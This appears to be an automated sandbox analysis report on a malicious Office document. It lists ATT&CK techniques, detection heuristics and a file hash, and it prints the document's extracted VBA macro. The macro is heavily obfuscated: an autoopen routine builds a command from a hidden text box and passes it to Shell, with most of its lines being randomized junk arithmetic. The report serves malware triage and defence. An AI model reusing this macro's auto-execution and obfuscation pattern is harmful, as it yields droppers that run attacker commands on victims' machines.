Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers the execution of the 'NRGtcHFQ' function, which contains a critical 'Shell()' call. This indicates the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The presence of 'SC_STR_CMD' and 'OLE_VBA_SHELL' heuristics further supports this malicious behavior.
Heuristics (9)
- ClamAV: Doc.Malware.Generic-6781496-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6781496-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  `_ .Shell(VnhqJLjbH, rHfRiTnPt), rpwzQ) Set PPDzQHNHzvLnNVjaUGwt = DqblwGnjzRrEbKMYljVjZk`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() NRGtcHFQ`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs found in document text (OLE body):
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocP
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8734 bytes |

SHA-256: be39ce2d3e3edbe602789ffa98c05669c67174fd383c27b28241b3b44b77fc8b

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 241 of 274 identifiers look randomly generated (e.g. 'ihukDzZiWzwXBBwRwfjoGLIN'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "AuapWicMiTR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
NRGtcHFQ
End Sub
Attribute VB_Name = "jwjbwdvRmtdZD"
Function NRGtcHFQ()
On Error Resume Next
Set QzVidFSRLJJIwCd = UhZEZNruGbMllZOMOJlj
mijFJwZiZKhDNHJwi = Sqr(DGbYBshjmvzumQwPhDszQ)
RLjRfhYREPkZhamOc = 258868852 * Oct(dKikfXQGzZGDiUmpPrk) * 89032365 * HUriJNjWdSaFbmGnbBtPbbsw - (77091548 + CLng(FvlXXsZYVqnCVJh) * 238525842 * CBool(131546825))
fwChfBnpqwYfctW = ChrW(HnlFvifDRQzZfj)
Set fEDaDFtOhnrtZUuD = BhUXvKTSWTWPSWz
wROvpLwUvYcpiRGOwbVUBpk = Sqr(kIjmXwPRuBbCjHSqkAbWhdn)
NIRqAcqIhULjfKz = 324310381 * Oct(LucqDhqIfjBONMG) * 141191382 * YPhYQRLTVMvmKaCiNWj - (70118463 + CLng(KaaiVtouTHEKElhQk) * 309546375 * CBool(190376364))
WhVuVUIwjzqXKMOpG = ChrW(vYWZCErbGpVOdbGtscEfMA)
Set mbSmQMpzCQiYlHjPFQNjwfuS = BBQmoPRZnwwLHXTYlktsqjUV
VllLBHhAnPLZKOARww = Sqr(kDzstKLuAZIUjvS)
dfOmqQLUHHzaVsbsi = 74287483 * Oct(QXssBpMjaivfdsvXljLST) * 290737586 * llKlYIzQlVLCuknNwdjl - (276917799 + CLng(cWhaVqIWsQYuHGqE) * 261507827 * CBool(160780067))
NJKSqAmzWPojGnYJoDwn = ChrW(IPcudAdhWsqLIcD)
Set mYJjfiZaclkFISvNESp = jIhmJJzGOfjjzwMmM
EhzillWTGuwjfBB = Sqr(tdqWaVfTLzFEHJFJBwNIQ)
XvQpDFIhziiMEi = 314700982 * Oct(ijBfSnjSMwooijotUrGvGl) * 115998388 * LdzaZuFXNLOdGkjjOzd - (51553920 + CLng(TCQqlsMbAjwRbUpqF) * 295605155 * CBool(114706381))
RbSVKnjIXjIHJJsahkoCsv = ChrW(cRMiQusIELRwsjuf)
Set cEMnjjnAwTcdtq = oqrZvWsPGcXWQNWJfUobt
ihukDzZiWzwXBBwRwfjoGLIN = Sqr(mZJzJFOntMJiLSsqXGa)
sLUNNWJsEpTZhMQZPlM = 290301401 * Oct(jIpnmmMqwiEimfbFwjnvW) * 229092235 * skwwBSamtisICf - (171204148 + CLng(jwBGHOqvhpUTCZwLAEw) * 19812840 * CBool(275206463))
KXXvLAtWYaWHDzUcwitBRM = ChrW(HkUmhHziWlvliiLDqBLQuzuV)
Set UNiuGlWNLnIjtwEibaPMVL = HAmwlvqDsciUKMHljudYDM
zLFkDzYbUIZauTnlRUjQGKcu = Sqr(TpiSrnluBomjLnDTB)
LklNRtJMDTwsnjKS = 237151605 * Oct(qJdVojsiAEGjfzFw) * 111912317 * jFXoJijRwIADVtDt - (189152741 + CLng(kpwFUmsEFWoznrSAmimBzzm) * 149165385 * CBool(225705729))
iziNdlUNMbMbkkvEZMdzU = ChrW(lVHZHaskDaWlIvV)
Set jIloYkFETBGtZFMsFTOUrS = KYYYYQtGQdoRbviBjoZa
pljPkSYNYBwQbbPAMhoa = Sqr(pQkolzbRifRsBUnrInzUtsc)
AzTOBXHlzkAVwbzUzvtVfYa = 48659916 * Oct(JDuqFCzotnliMQHYjtQT) * 117661255 * jndXzwGMcZMmrTNutiDhCoO - (278718846 + CLng(imzzfJnKOWGNiEwhhLLSZ) * 162582956 * CBool(264662602))
lziQkssZmmSMJMzQ = ChrW(bdwGhLiEzVcCYLGzlOf)
Set pCzYMjBfWrGoQCVFWrYWilcl = kZlalOaLIGBMRmFoESX
JHljMdVDSSEZMzc = Sqr(QEldjdHvTtEETiaS)
fPcnBOIsWsqBbA = 117727492 * Oct(vYAhuZfAqPTYQkjr) * 248277590 * jjAWOqckKkQtstmuXK - (175286312 + CLng(KFkczmujclIzQGTiKZJJF) * 67138309 * CBool(103241983))
jwXZlWNZQALbzYYcvsIYbRdl = ChrW(EkzAQjzposBPVwFYiiP)
Set iVQTIJiujFXGiUoRzrbiE = QLnUHwANnqEoiEdirjATGdz
RzNCwGssikEFjnCktWShCqm = Sqr(nQAsilnnNvCJkwOjzMJwz)
CDjQZkKQpbKiPhGAJtw = 113840493 * Oct(klsAvHlkqjojOOwLSLDczFb) * 331788306 * jhawCPBijRSnPdc - (168554324 + CLng(zuWuATKprhsouiKutMaK) * 257237829 * CBool(263279466))
mBiwdXCibDRGjbLjO = ChrW(HKiIummItWRCOtLdk)
Const rHfRiTnPt = 0
Set KrWLozOLMTYYAVwGsznZi = YLuKVBPkPBHqoZSpMIEOuwUs
fRAlPXhCMTKQiiNvbEW = Sqr(KhXnDkfVQDbrBkpjO)
AianbGHYidqSSrzbPzuNiisL = 248912446 * Oct(rTOtodhcEsqXGRfi) * 11528875 * iwkjtaVsoAQVlO - (12193482 + CLng(OoKppNkpnFlsrdhDd) * 285123233 * CBool(220438253))
ZIZoYwohMjHbVpCqUMLRNv = ChrW(opdBLSNsuhOrGOVQtYDdEwJW)
Set CwcaUwVnfFQquGMtHCuZB = jCjCBBIznmzUbQHtrXt
opDwBmacHwiticOauSz = Sqr(fhSdsaivlNKWfcluwh)
ObfprDElzChwZa = 166182967 * Oct(HXaGaHirulMNGqUcNRjszra) * 174986230 * oftDOkwGiiWYbaGzovFqrf - (59498649 + CLng(ElHqjuPwzRmcknfBQGXLz) * 27954117 * CBool(252541721))
dvKwVjzJWLwddGZoOaYJndM = ChrW(QEakIzkAzPMljT)
Set AMVWLMCZoJGIcjzqXKQ = dBXWotcvzQlrHbYOcIBhlfH
BfirqVrVAMwzpwhSkHbXXPB = Sqr(HiNOIiGztjUILk)
cYPqufZZiaiwdD = 236677244 * Oct(mihjIHdNSGwFIdYHzD) * 334852152 * IYGViJjnZlctJNhidAwVvCYn - (218604506 + CLng(QACbzaFlKOXLBzXpnj) * 199255604 * CBool(27896539))
uwtdzHdCFzSoOsilwoBoYDTH = ChrW(zwzGPsJcYVEIzzTbi)
VnhqJLjbH = AuapWicMiTR.TextBox1 + XnGoD + cPWrcmLz + wqHJLpX + AqiNqwE + MpJCaAhN + bVmzIwm + AtCjtYjR + vMzjK + VtQGbz + DGOsaQDk
Set mRJAUtimpKmvoTDQsHNrUa = aaKmkZEaUticsjGzfYjvRXj
PWziKQPUMZjaKHwNljSCJr = Sqr(klHhSniaDuWWObZQ)
dKQTwjpYaSJhFd = 197480111 * Oct(LNtDjwjhwfjnkkmMTOZ) * 334325266 * qnERIsUUswQswDNjNTj - (200904017 + CLng(VRABoqjzOqEfzUZolaELN) * 36052836 * CBool(221990081))
vlhYfGvsUrVWEQUBo = ChrW(iIMNAinsbtcTVQjlGC)
Set EHhpIwiiBrljWzczjb = waHCltaEfHbbwGwuDpsYG
zAhSbsiffzpcfswEvwirwXaP = Sqr(dYCYIrCdzdHVTRhaAcblWa)
wzuvqOzZaRfwTbH = 151930296 * Oct(nzhPpicfARwvwiQ) * 18416651 * DZNvMOwDjEnSNwsFTw - (155498578 + CLng(qJQSQpzBicnPvAXiJMbkjMI) * 203062514 * CBool(269848247))
mSFqifsKcuJvfWRz = ChrW(DQXWMbKvHXnIdBldDDi)
Set FsrhLoGowjnLhqXvZwKjwC = zlqOoBjdwtmTEjWnMzTK
ljsuKrUohAsCLu = Sqr(VaSmSDoRuWSOCLzjdsjMEzTi)
LoRtuQsmaSlhjswz = 101570401 * Oct(YrdSdjQPKihrXHncGPXXAFZc) * 188319234 * LCwAkOpAumjtKhcfGNEiuit - (28212119 + CLng(harzSRApjXOSKuTCXMBwN) * 28865152 * CBool(275133064))
UzLXuzhIrOCozCbUfDbJOMw = ChrW(lfXSsIYckwcTGdvkqF)
Set kIGnZvfpJhZRLYictwJkt = QLmJrlEMDfpOziYNp
qQdljAhHbtTDsKq = Sqr(suAPEukziubwYzEfGE)
dniclcjJKsAmfXjmdMZBwfj = 51066699 * Oct(ZkjcoowoRNjOSOnUkaEdHw) * 165296134 * NbSjDwzHWmMsAhVEDwOKzXK - (328674427 + CLng(jMFbdhdLrONVQkUPYrjCvT) * 19126804 * CBool(28861696))
aJhOrpQUuWkrfsEjjJSHinNu = ChrW(ajivrMJBbCYvwzZzAVOjXtw)
Set dmztbwRjZkBuFlfk = zEQEktKMwqljIw
HNpACrdKjBPNjo = Sqr(jolowSuItspjfIfDQn)
nswfiKWuhDVjaY = 184801117 * Oct(zuUzhMFvHMKzCDww) * 172310886 * AbkICdaYNFYMPIDwiIwnT - (176300633 + CLng(AXVzYriFWGrXAZosqZJzzX) * 309894409 * CBool(325181827))
uDVpCmOZojkjdC = ChrW(jABGXlDZtQFOKbnccYzd)
Set jIbpqESaFucRNAlNYWCRfoY = EscZAjFrBMcirTuvIjVHF
dNOqswOvLrjulwcsZVplPBY = Sqr(WEbGJwTRcJOOKJ)
GcGAlzwhwSQHzRUfbpMUnXH = 250958078 * Oct(XSSbkOhQdjIJAmDZ) * 151420011 * ntrTzIimZwpEjUUoOjiG - (78044946 + CLng(iqWiLVaCJuQsUsV) * 23040309 * CBool(127960818))
zzojbZznpMYWuQTi = ChrW(AzQwILXounrAbTKN)
Set djiuMYbiLoKZlSK = zZGCBbPXNFbwPwHOowLvj
QkvzKMcItYwCiXCjGCQKh = Sqr(zdONhvlnHPBOJVG)
QCvEMDzNPjMFsJ = 198608703 * Oct(DKnRjzfjXFRjAUOjcCl) * 91751350 * cttiAzzijvzlcKzio - (132898186 + CLng(XPhGmPNvUjcpYQKbQt) * 261849444 * CBool(228514147))
hwrKTwXKPwniSq = ChrW(unHOnCcBDFZVSijoAlSqQqwS)
Set twEKHUcwEiLakSUPc = rTSVjFVoMnYsmzqXUvJ
TncUICpHnKdiZUvwwXOwoSHo = Sqr(LwNjNzZFdGErwNhQNAB)
uSSBsawjKKAfntwF = 184559121 * Oct(aNDYwNrGwKhiaRGijt) * 197770610 * rmAtvSFYEEQboqao - (44508647 + CLng(VEKlcmwbjjZJNDbQfo) * 83609952 * CBool(68915496))
iHSCuuFukrRXKXZBGKOu = ChrW(iWzuqNAXKlcwsrwrjh)
lFipHFZKj = Array(lZvwEwo, tdEbj, mwzAj, Interaction _
_
_
_
_
_
_
_
.Shell(VnhqJLjbH, rHfRiTnPt), rpwzQ)
Set PPDzQHNHzvLnNVjaUGwt = DqblwGnjzRrEbKMYljVjZk
PSMMQzFANNrLYbORAZXzd = Sqr(jmKUBjZcJNTIMTluXk)
RiqjznwXOVKCmEviaBwzWbk = 27639430 * Oct(sPPvfGBnCMpsDLjELKHw) * 73630971 * ERkLsbmYptmEHYhcjOIP - (237580382 + CLng(FpXpQtKQdFTLLwKUNaAiWvG) * 332099660 * CBool(29932911))
XjbspvwLLvnDLtO = ChrW(QjlvNjROBiOFWJjZlIW)
Set ZiUiWKZwbVmNqOrmNvzoh = uwrpdTQtQitpDGuqEzPp
tWuiASfdqinBwnWmhjFiiEDT = Sqr(LlrXqBYshBbzKc)
kQZAGnGSYDXQKG = 86009194 * Oct(TbdpjoGAjOJPmupWDDwSfC) * 85453647 * ETTTTkOlUNHVhnUv - (66372024 + CLng(UrdrjdNANGHuJQOPkNV) * 251002841 * CBool(214680484))
AYuYnUpQiCIFiVjNmpGTXIdZ = ChrW(rGRCHaXsYrFwHq)
Set SIqZiJLcNiIduIqYKlCSsMj = NzIzchqOizpYAQWCCpp
fHlJXHDLAPzFYOLiBMzjrt = Sqr(vSRYtOzQDXuwGOzcVifOOAjA)
EsBppIzlIqqGiJzAwwiiS = 39282750 * Oct(CkiCLfjujRnoWwaNO) * 318366974 * zYJWmUiNPEBVTwbz - (35723368 + CLng(GlGYvHovUaCYiTiH) * 53660337 * CBool(288885746))
OshdRUqhwTquzVBIKEZcBhq = ChrW(HLrVimMqkGrTYIoEEZsbijDD)
Set fAzLbmufmiwcCqXPBGvjREw = ViUmzmjuhrhJiSp
EiWtnwkJlwjXkObaDrqtSIf = Sqr(wCvKJNljRDciiDUYzKABCLJT)
GFmcvZvDWukBZAXNA = 38287874 * Oct(lsrAWRvIIiwnsbuCIwHW) * 200460291 * fMJjXYJcoBFchYOFPKAQm - (165259437 + CLng(GsZfzPOtjCEMfrnuXwj) * 276095883 * CBool(309829962))
PuVnCjwWNuGmCrzsMMZIW = ChrW(dLjOcQcSGjiZcfJJNiz)
End Function